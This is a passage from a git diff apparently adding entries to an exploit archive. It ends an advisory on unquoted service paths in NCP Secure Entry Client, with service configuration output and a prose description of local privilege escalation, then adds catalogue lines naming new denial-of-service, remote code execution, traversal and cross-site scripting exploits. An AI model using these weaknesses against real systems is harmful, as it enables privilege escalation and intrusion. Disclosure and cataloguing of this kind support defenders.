+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : rwsrsu
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+		
+C:\Users\ADMIN>sc qc ncpclcfg
+[SC] QueryServiceConfig SUCCESS
+
+        SERVICE_NAME       : ncpclcfg
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ncpclcfg
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem		
+		
+C:\Users\ADMIN>sc qc NcpSec
+[SC] QueryServiceConfig SUCCESS
+
+        SERVICE_NAME       : NcpSec
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : NcpSec
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+		
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during
+application startup or reboot. If successful, the local user's code
+would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 43e9df202..3bc80428b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6594,6 +6594,9 @@ id,file,description,date,author,type,platform,port
 47609,exploits/windows/dos/47609.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-11-11,"Google Security Research",dos,windows,
 47610,exploits/windows/dos/47610.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)",2019-11-11,"Google Security Research",dos,windows,
 47657,exploits/hardware/dos/47657.txt,"Siemens Desigo PX 6.00 - Denial of Service (PoC)",2019-11-14,LiquidWorm,dos,hardware,
+47662,exploits/windows/dos/47662.txt,"iSmartViewPro 1.3.34 - Denial of Service (PoC)",2019-11-18,"Ivan Marmolejo",dos,windows,
+47665,exploits/ios/dos/47665.py,"Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)",2019-11-18,"Luis Martínez",dos,ios,
+47671,exploits/windows/dos/47671.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-11-18,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10774,6 +10777,10 @@ id,file,description,date,author,type,platform,port
 47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows,
 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,
 47660,exploits/windows/local/47660.txt,"Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path",2019-11-15,D.Goedecke,local,windows,
+47661,exploits/windows/local/47661.txt,"Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path",2019-11-18,"Luis Martínez",local,windows,
+47664,exploits/windows/local/47664.txt,"ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path",2019-11-18,"Olimpia Saucedo",local,windows,
+47667,exploits/windows/local/47667.txt,"MobileGo 8.5.0 - Insecure File Permissions",2019-11-18,ZwX,local,windows,
+47668,exploits/windows/local/47668.txt,"NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths",2019-11-18,"Akif Mohamed Ik",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17786,6 +17793,7 @@ id,file,description,date,author,type,platform,port
 47625,exploits/hardware/remote/47625.py,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution",2019-11-12,LiquidWorm,remote,hardware,
 47626,exploits/hardware/remote/47626.rb,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)",2019-11-12,LiquidWorm,remote,hardware,
 47629,exploits/hardware/remote/47629.txt,"CBAS-Web 19.0.0 - Information Disclosure",2019-11-12,LiquidWorm,remote,hardware,
+47673,exploits/linux/remote/47673.py,"nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)",2019-11-18,"Guy Levin",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41975,3 +41983,8 @@ id,file,description,date,author,type,platform,port
 47653,exploits/php/webapps/47653.txt,"gSOAP 2.8 - Directory Traversal",2019-11-13,"numan türle",webapps,php,
 47654,exploits/hardware/webapps/47654.py,"Fastweb Fastgate 0.00.81 - Remote Code Execution",2019-11-13,"Riccardo Gasparini",webapps,hardware,
 47659,exploits/php/webapps/47659.txt,"Xfilesharing 2.5.1 - Arbitrary File Upload",2019-11-14,"Noman Riffat",webapps,php,
+47663,exploits/hardware/webapps/47663.txt,"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal",2019-11-18,"Kevin Randall",webapps,hardware,
+47666,exploits/asp/webapps/47666.txt,"Crystal Live HTTP Server 6.01 - Directory Traversal",2019-11-18,"numan türle",webapps,asp,
+47669,exploits/hardware/webapps/47669.sh,"Centova Cast 3.2.11 - Arbitrary File Download",2019-11-18,DroidU,webapps,hardware,
+47670,exploits/php/webapps/47670.txt,"TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)",2019-11-18,"Pablo Santiago",webapps,php,
+47672,exploits/php/webapps/47672.txt,"TemaTres 3.0 - 'value' Persistent Cross-site Scripting",2019-11-18,"Pablo Santiago",webapps,php,